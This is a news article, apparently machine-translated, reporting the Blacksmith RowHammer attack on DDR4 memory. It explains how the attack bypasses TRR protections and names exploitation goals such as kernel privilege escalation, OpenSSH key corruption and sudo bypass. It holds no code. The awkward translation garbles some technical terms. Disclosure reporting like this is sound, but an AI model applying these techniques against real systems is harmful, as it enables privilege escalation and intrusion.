A group of researchers from the Swiss Higher Technical School in Zurich, the Free University of Amsterdam and Qualcomm have released a new RowHammer attack method that alters the content of individual bits of dynamic random access memory (DRAMS).
The attack was codenamed Blacksmith who identified himself as CVE-2021-42114 and that affects many DDR4 chips, which are protected from the previously known methods of the RowHammer class, but with this new variant they are affected by the problem.
For those who do not know what kind of attack it is RowHammer, I can tell you that this allow you to distort the content of individual memory bits by cyclically reading data from neighboring memory cells. Since DRAM is a two-dimensional array of cells, each of which consists of a capacitor and a transistor, taking continuous readings in the same memory area results in voltage fluctuations and anomalies, causing a small loss of charge. in neighboring cells. If the reading intensity is high, then the neighboring cell may lose a large enough amount of charge and the next regeneration cycle will not have time to restore its original state, which will lead to a change in the value of the data stored in the cell.
To protect against RowHammer, the chipmakers proposed a TRR mechanism (Target Row Refresh), which protects against corruption of cells in adjacent rows, but since the protection was based on the principle of "security by obscurity", it did not solve the problem at the root, but protected only from known special cases, which which facilitated the search for ways to circumvent protection. For example, in May, Google proposed the Half-Double method, which was not affected by TRR protection, since the attack affected cells that were not directly adjacent to the target.
The new method of Blacksmith offers a different way to bypass TRR protection, based on an inhomogeneous treatment with different frequencies to two or more aggressor chains to cause load leaks.
To determine the memory access pattern that leads to load heat, a special fuzzer has been developed, which automatically selects the attack parameters for a particular chip, varying the order, intensity and systematization of access to cells.
Such an approach, which is not associated with exposure to the same cells, renders current TRR protection methods ineffective, which one way or another is reduced to counting the number of repeated calls to cells and, upon reaching certain values , start recharging. neighboring cells. At Blacksmith, the access pattern is spread across multiple cells at once on different sides of the target, allowing charge leakage without reaching threshold values.
The method turned out to be much more effective than previously proposed methods in circumventing TRR- Researchers managed to achieve bit distortion on 40 different DDR4 memory chips recently purchased from Samsung, Micron, SK Hynix, and an unknown manufacturer (manufacturer was unspecified on 4 chips). For comparison, the TRRespass method previously proposed by the same researchers turned out to be effective for only 13 of the 42 chips tested at that time.
Generally speaking, it is assumed that the method Blacksmith is applicable to 94% of all DRAM chips on the marketBut according to the researchers, some chips are more vulnerable and easier to attack than others. Using error correcting codes (ECC) and doubling the refresh rate on the chips does not provide complete protection, but does complicate operation.
It is noteworthy that the problem cannot be blocked on already released chips and requires the implementation of a new protection at the hardware level, so the attack will remain relevant for many years.
As practical examples, the methods of using Blacksmith to change the content of the memory page table entries (PTE, page table entry) to obtain kernel privileges, corrupts the RSA-2048 public key stored in memory in OpenSSH (you can bring the public key in a foreign virtual machine to match the attacker's private key to connect to the victim's virtual machine) and bypass the authorization check by modifying the sudo process memory to gain root privileges. Depending on the chip, changing a target bit takes between 3 seconds and several hours for the attack to occur.
Finally if you are interested in knowing more about it, you can check the details In the following link.